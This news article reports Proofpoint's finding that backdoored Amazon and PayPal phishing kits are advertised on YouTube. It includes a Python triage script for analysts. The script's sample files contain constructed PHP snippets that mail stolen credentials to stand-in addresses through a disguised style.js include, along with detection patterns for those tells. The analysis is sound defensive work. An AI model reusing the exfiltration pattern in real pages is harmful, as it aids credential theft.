According to experts from the security firm Proofpoint, scammers are advertising backdoored phishing templates on YouTube, along with “how-to” videos and manuals.
This is not a novelty: cyber criminals are turning to legitimate websites to offer their products and services.
Proofpoint researchers have observed scammers distributing phishing templates and related kits via YouTube; a query for “paypal scama” returns over 114,000 results.
The kits offered for sale through YouTube include a backdoor that automatically sends the phished information back to the author.
“A simple search for “paypal scama” returns over 114,000 results. There’s a catch, though, for criminals downloading the software: a backdoor sends the phished information back to the author. While backdoors on these templates aren’t new, the use of YouTube to advertise and distribute them is a new trend.” reads a blog post published by Proofpoint.
The videos show what the templates look like and instruct potential buyers on how to steal information from victims with phishing attacks.
As an example of these malicious kits, the post shows an Amazon phishing template that replicates the legitimate login page of the popular website.
The researchers downloaded one of the kits advertised on YouTube and analyzed it, discovering that the clumsy scammer left his Gmail address hardcoded in the template alongside an email address used to receive the stolen credentials from the template.
The researchers also analyzed a template for PayPal scammers that was improved to avoid suspicion.
“In this PayPal scam, the author attempts to avoid raising suspicions by adding a PHP include for a file called style.js just before the PHP “mail” command is used to ship off the stolen credentials.” reads the analysis.
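For analysts triaging a recovered kit, the two tells described above (hardcoded recipient addresses and a PHP include of a file with a non-PHP name such as style.js ahead of a mail call) can be checked mechanically. The following is an added example, not Proofpoint's tooling or code from the original post; the function name triage_kit, the file name login.php, and the sample contents and addresses are constructed for illustration.

```python
import re

# Constructed sample files that mimic the pattern described above; not taken from a real kit.
SAMPLE_KIT = {
    "login.php": "<?php\n$to = 'operator@example.com';\ninclude 'style.js';\n"
                 "mail($to, $subject, $message);\n",
    "style.js": "<?php\n$hidden = 'author@example.net';\n"
                "mail($hidden, $subject, $message);\n",
}

PHP_EXTS = (".php", ".phtml", ".inc")
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
INCLUDE_RE = re.compile(
    r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]([^'\"]+)['\"]", re.I)
MAIL_RE = re.compile(r"\bmail\s*\(", re.I)


def triage_kit(files):
    """Scan {filename: source} and report where stolen data would be sent."""
    report = {"recipients": {}, "disguised_includes": [], "php_in_non_php": []}
    for name, text in sorted(files.items()):
        # Every hardcoded address is a candidate exfiltration mailbox.
        for addr in EMAIL_RE.findall(text):
            report["recipients"].setdefault(addr.lower(), []).append(name)
        # PHP code living in a file named like a static asset.
        if not name.lower().endswith(PHP_EXTS) and "<?php" in text.lower():
            report["php_in_non_php"].append(name)
        # include/require of a non-PHP file, and whether mail() follows it.
        for m in INCLUDE_RE.finditer(text):
            target = m.group(1)
            if target.lower().endswith(PHP_EXTS):
                continue
            line = text.count("\n", 0, m.start()) + 1
            mail_follows = MAIL_RE.search(text, m.end()) is not None
            report["disguised_includes"].append((name, target, line, mail_follows))
    return report


if __name__ == "__main__":
    for key, value in triage_kit(SAMPLE_KIT).items():
        print(key, value)
```

The recipient addresses it surfaces are the ones worth passing to the mail provider's abuse desk, since the mailboxes behind them receive the stolen credentials.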
The researchers noticed that many videos have been posted for months, which suggests that YouTube lacks filtering mechanisms for this kind of content.
“Many of the video samples we found on YouTube have been posted for months, suggesting that YouTube does not have an automated mechanism for detection and removal of these types of videos and links. They remain a free, easy-to-use method for the authors of phishing kits and templates to advertise, demonstrate, and distribute their software,” states Proofpoint.
(Security Affairs – phishing templates, cybercrime)